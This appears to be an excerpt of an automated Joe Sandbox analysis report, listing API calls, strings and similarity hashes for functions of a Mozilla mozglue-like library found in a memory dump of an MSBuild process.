
APIs

Part of subcall function 6C494290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C4D3EBD,6C4D3EBD,00000000), ref: 6C4942A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C4EB127), ref: 6C4EB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4EB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C4EB4E4

Strings

pid:, xrefs: 6C4EB4DE

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 5bab657bd2996135615f583028c54f9fc00265cae88f4adaf8ecf320fd59a733
Instruction ID: e9cffe9b2561a3f47341497d8ee8d227b33659eeeb19e5c8762b01eb6028bc37
Opcode Fuzzy Hash: 5bab657bd2996135615f583028c54f9fc00265cae88f4adaf8ecf320fd59a733
Instruction Fuzzy Hash: 0C311031A013089FDB00DFA9D884EAEB7B5FF0831AF56052DE81167B41D732A849CBE5

Function 6C4ABF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C4F7A3F), ref: 6C4ABF11
?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C4F7A3F), ref: 6C4ABF5D
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C4F7A3F), ref: 6C4ABF7E

Strings

Pl, xrefs: 6C4ABF84

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
String ID: Pl
API String ID: 4279176481-1791145779
Opcode ID: 0abc59229e31f61d5b6374cda6767ed5a84ee3886340ab70d20c8ac105667222
Instruction ID: d54c4dce5f982d63ea94efce98d13c31c7ee7260eeeee70198ef642fb055b794
Opcode Fuzzy Hash: 0abc59229e31f61d5b6374cda6767ed5a84ee3886340ab70d20c8ac105667222
Instruction Fuzzy Hash: 2311BFB93006048FC729CF0CD999A26FBF8FF59304315889DE98A8BB51C771AC00CB94

Function 6C49F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C50D020), ref: 6C49F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C49F132

Strings

SHGetKnownFolderPath, xrefs: 6C49F12C
shell32, xrefs: 6C49F11D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 64d064a8378bc6d759440e131609e93030ab97e89589298c59393e7e3c88ad8f
Instruction ID: d010d391c2ca9f7e8a0fbf1a58ae59d0784f8bedc20c040929e9a15f5ad54164
Opcode Fuzzy Hash: 64d064a8378bc6d759440e131609e93030ab97e89589298c59393e7e3c88ad8f
Instruction Fuzzy Hash: 98014C717012259BEB00DF65DC89E5B7BB8EF8A655B510519F84997B00D730A904CBE4

Function 6C4DE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4DE577
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DE584
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C4DE8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C4DE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C4DE722, 6C4DE750, 6C4DE7A2
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C4DE826, 6C4DE850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C4DE655
MOZ_PROFILER_STARTUP, xrefs: 6C4DE5A1, 6C4DE5CC, 6C4DE5FF, 6C4DE62A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 8d673da56784604f84df61552b4c189c6213a60a7aacb68f9992355f4810f5c6
Instruction ID: c13be66ed02d85d107d154c84128674c67139fd33f0bbdc4054de67b2120c49c
Opcode Fuzzy Hash: 8d673da56784604f84df61552b4c189c6213a60a7aacb68f9992355f4810f5c6
Instruction Fuzzy Hash: 4A11CE35604254DFDB00EF15CC8EE6ABBF4FB89368F420619E84547F50D7B4A844CB99

Function 6C4E0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4E0CD5

Part of subcall function 6C4CF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C4CF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4E0D40
free.MOZGLUE ref: 6C4E0DCB

Part of subcall function 6C4B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4B5EDB
Part of subcall function 6C4B5E90: memset.VCRUNTIME140(ewOl,000000E5,?), ref: 6C4B5F27
Part of subcall function 6C4B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4B5FB2

free.MOZGLUE ref: 6C4E0DDD
free.MOZGLUE ref: 6C4E0DF2

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 8cb8eb8e97e4ed086ffe4aad057351573cf1d7f921e7e2d507480be02718bb1b
Instruction ID: b905ae05cb8cb1a0e947fc21a40c627ba39324c5f9304c43dedb1cbe0bc28ec3
Opcode Fuzzy Hash: 8cb8eb8e97e4ed086ffe4aad057351573cf1d7f921e7e2d507480be02718bb1b
Instruction Fuzzy Hash: A3413C759087808BD320CF29C480F9AFBE5BFC9755F118A2EE8E887710DB70A445CB92

Function 6C4E9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C4E8242,?,00000000,?,6C4DB63F), ref: 6C4E9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C4E8242,?,00000000,?,6C4DB63F), ref: 6C4E91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C4E8242,?,00000000,?,6C4DB63F), ref: 6C4E91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C4E8242,?,00000000,?,6C4DB63F), ref: 6C4E9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C4E8242,?,00000000,?,6C4DB63F), ref: 6C4E9219

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: ed134b69daefd15a5f504cee04d19683d95c4874ea40661986339dca7edc958c
Instruction ID: 80611b6a626d101ca34787744991492062dfdf28019aeb59a525790ebcd855b2
Opcode Fuzzy Hash: ed134b69daefd15a5f504cee04d19683d95c4874ea40661986339dca7edc958c
Instruction Fuzzy Hash: 80312331A016058FEB00CF68DC44FAE73A5EF95316F524A39D856C7780EB32E805CBA1

Function 6C4D0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51E7DC), ref: 6C4D0838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C4D084C
EnterCriticalSection.KERNEL32(?), ref: 6C4D08AF
LeaveCriticalSection.KERNEL32(?), ref: 6C4D08BD
LeaveCriticalSection.KERNEL32(6C51E7DC), ref: 6C4D08D5

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: f8919eeabe55457ccb3ba622bfbac6ac927d954b54349c6a35c14a320184a2fa
Instruction ID: f85992fd29d7d45a298bb14dfd46e0cffd194db7d4fa38d12c21fc84aacd67b0
Opcode Fuzzy Hash: f8919eeabe55457ccb3ba622bfbac6ac927d954b54349c6a35c14a320184a2fa
Instruction Fuzzy Hash: 2721CF30B042498BEB04EF65DC99FAE77B9AF45709F520528E909A7F00DB71A8448BD4

Function 6C4ECCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C4DDA31,00100000,?,?,00000000,?), ref: 6C4ECDA4

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

Part of subcall function 6C4ED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C4ECDBA,00100000,?,00000000,?,6C4DDA31,00100000,?,?,00000000,?), ref: 6C4ED158
Part of subcall function 6C4ED130: InitializeConditionVariable.KERNEL32(00000098,?,6C4ECDBA,00100000,?,00000000,?,6C4DDA31,00100000,?,?,00000000,?), ref: 6C4ED177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C4DDA31,00100000,?,?,00000000,?), ref: 6C4ECDC4

Part of subcall function 6C4E7480: ReleaseSRWLockExclusive.KERNEL32(?,6C4F15FC,?,?,?,?,6C4F15FC,?), ref: 6C4E74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C4DDA31,00100000,?,?,00000000,?), ref: 6C4ECECC

Part of subcall function 6C4ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C4ACAA2

Part of subcall function 6C4DCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C4ECEEA,?,?,?,?,00000000,?,6C4DDA31,00100000,?,?,00000000), ref: 6C4DCB57
Part of subcall function 6C4DCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C4DCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C4ECEEA,?,?), ref: 6C4DCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C4DDA31,00100000,?,?,00000000,?), ref: 6C4ED058

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: de78f7559cd914f650d4bee34ceeb417154fadc04b8faa16ae5e810e908f08d1
Instruction ID: 4821336ced894550cd7b54e82f5a3c820de83410b3eeb7ac16a916a10f53bd2a
Opcode Fuzzy Hash: de78f7559cd914f650d4bee34ceeb417154fadc04b8faa16ae5e810e908f08d1
Instruction Fuzzy Hash: A1D15D71A04B069FD709CF28C480F99B7E1BF99308F06866DD85987752EB31A9A5CBC1

Function 6C4A1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C4A17B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C4A18EE
free.MOZGLUE(?), ref: 6C4A1911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4A194C

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 8b0eb2810d65ad2b8a4eddd26fba8e4f5ecf9c2378451aa8de0d3ddb32571338
Instruction ID: 69911eaee4f02d479e15de8ab6ca30de1fa809b5970a41a81d347d59bd52cbf8
Opcode Fuzzy Hash: 8b0eb2810d65ad2b8a4eddd26fba8e4f5ecf9c2378451aa8de0d3ddb32571338
Instruction Fuzzy Hash: 6681B074A11205DFCB08CFA8D884DAEBBB5FF99314F04452DE855AB758D730E846CBA2

Function 6C4B5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C4B5D40
EnterCriticalSection.KERNEL32(6C51F688), ref: 6C4B5D67
__aulldiv.LIBCMT ref: 6C4B5DB4
LeaveCriticalSection.KERNEL32(6C51F688), ref: 6C4B5DED

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: c822f54480fae665bf8cc7933105977a3438f09e9596be4dc8c6a8f04793a3c9
Instruction ID: 214481663e60ee9357c7ec964b6bbc690ce74a31f7a8b9f534981656a9bae19c
Opcode Fuzzy Hash: c822f54480fae665bf8cc7933105977a3438f09e9596be4dc8c6a8f04793a3c9
Instruction Fuzzy Hash: D0512D71E002198FDF08CF68C859EAEBBB6BB85304F1A871DD815B7B51C7706945CBA4

Function 6C4F7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C4F7250
EnterCriticalSection.KERNEL32(6C51F688), ref: 6C4F7277
__aulldiv.LIBCMT ref: 6C4F72C4
LeaveCriticalSection.KERNEL32(6C51F688), ref: 6C4F72F7

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: ad648138fd57872c7545e9a4549b2f94b1c60f63814973fb9bad6ac2f05cdbc7
Instruction ID: aa5fc7d510ba58e59ad58f3c56657f3d68c2c3b8d3fece3546d3d60b4ce62362
Opcode Fuzzy Hash: ad648138fd57872c7545e9a4549b2f94b1c60f63814973fb9bad6ac2f05cdbc7
Instruction Fuzzy Hash: 01514F71E041198FCF08CFA8CC59AAEBBB1FB89304F16862DD825A7B50C7756946CBD4

Function 6C49CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C49CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C49CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C49CF4E

Strings

0, xrefs: 6C49CF30

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: cf428dac349f244375066d9a2c785349af82271e318af10ba877892a0e5b68fb
Instruction ID: ca402b5aecf840c41215fb41d4eac0ea73d76e3989ce0cf02111244fa97780e1
Opcode Fuzzy Hash: cf428dac349f244375066d9a2c785349af82271e318af10ba877892a0e5b68fb
Instruction Fuzzy Hash: C351F375A00226CFCB00CF18C890E9ABBA5EF99300F19859DD85A5F791D731AD06CBE0

Function 6C4F77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4F77FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C4F7829

Part of subcall function 6C4CCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C4931A7), ref: 6C4CCC45
Part of subcall function 6C4CCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C4931A7), ref: 6C4CCC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C4F789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C4F78CF

Part of subcall function 6C494DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C494E5A
Part of subcall function 6C494DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C494E97

Part of subcall function 6C494290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C4D3EBD,6C4D3EBD,00000000), ref: 6C4942A9

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: d5cd6a284e2c29e337c1c885ea2fb79e0aa307a56c5ec8ba2ddfdc6889d82f3d
Instruction ID: 20cacb971b1a6387d29ad3dc16abbc267480b6fb09be76855f52eaea6bf1b052
Opcode Fuzzy Hash: d5cd6a284e2c29e337c1c885ea2fb79e0aa307a56c5ec8ba2ddfdc6889d82f3d
Instruction Fuzzy Hash: EF418F719087469BD300DF29C88096AFBF4FFCA254F204A1DE4A987651DB70D55ACBD2

Function 6C4D6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C4D82BC,?,?), ref: 6C4D649B

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D64A9

Part of subcall function 6C4CFA80: GetCurrentThreadId.KERNEL32 ref: 6C4CFA8D
Part of subcall function 6C4CFA80: AcquireSRWLockExclusive.KERNEL32(6C51F448), ref: 6C4CFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D653F
free.MOZGLUE(?), ref: 6C4D655A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: bfc39a24ea132060385403bb93e4a1578f3dc2ec9f6b786f387ef60f4ac6107f
Instruction ID: af323fed2051d0e4b9b767b252cd65e0519e3aa8ad10123097a41274c6f6019d
Opcode Fuzzy Hash: bfc39a24ea132060385403bb93e4a1578f3dc2ec9f6b786f387ef60f4ac6107f
Instruction Fuzzy Hash: E3318DB5A043059FD700DF24D894E9ABBE4BF89314F01482EE89A97751EB34F919CBD2

Function 6C4CFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C4ED019,?,?,?,?,?,00000000,?,6C4DDA31,00100000,?), ref: 6C4CFFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C4ED019,?,?,?,?,?,00000000,?,6C4DDA31,00100000,?,?), ref: 6C4CFFF5
free.MOZGLUE(?,?,?,?,?,6C4ED019,?,?,?,?,?,00000000,?,6C4DDA31,00100000,?), ref: 6C4D001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C4ED019,?,?,?,?,?,00000000,?,6C4DDA31,00100000,?,?), ref: 6C4D002A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: dad781ab0dfbdd33c75b0c239ee75006b83d95f1f1f7fffc59fbf3d2ef5a68c6
Instruction ID: 58526c30322bf363c0a86444db3730290d172137a2dd59769e207126f04d011b
Opcode Fuzzy Hash: dad781ab0dfbdd33c75b0c239ee75006b83d95f1f1f7fffc59fbf3d2ef5a68c6
Instruction Fuzzy Hash: 2921A1B2B002155BD718DF789C94CAEB7BAEB853247250739E925D7780EB70AD0186E2

Function 6C4AB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4AB4F5
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4AB502
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4AB542
